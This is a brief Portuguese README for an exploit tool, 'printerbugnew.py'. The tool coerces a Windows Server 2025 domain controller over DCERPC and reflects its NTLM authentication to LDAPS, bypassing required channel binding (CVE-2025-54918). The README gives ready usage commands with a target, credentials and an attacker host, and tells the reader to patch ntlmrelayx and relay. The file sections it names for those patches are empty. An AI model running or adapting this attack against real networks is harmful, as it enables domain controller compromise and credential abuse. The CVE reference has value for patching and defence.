
A versão somente DCERPC do printerbug.py
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Este exploit via reflection funciona apenas no W2025 com o printerbug "novo" (DCERPC em vez de Named Pipes).
Você precisará modificar o ntlmrelayx em alguns pontos para que ele funcione. Depois disso, você pode acionar remotamente o printer bug em um DC W2025 e refletir a autenticação via LDAPS(!), mesmo se Channel Bindings estiver REQUERIDO
ldaprelayclient.py:

rpcrelayserver.py
e faça o relay ;)

A vulnerabilidade foi corrigida no Patch Tuesday de setembro de 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
A correção garante que o MIC seja sempre calculado, mesmo quando a mensagem Type 3 está vazia.
Agradecimentos ao autor deste CVE pela dica valiosa :)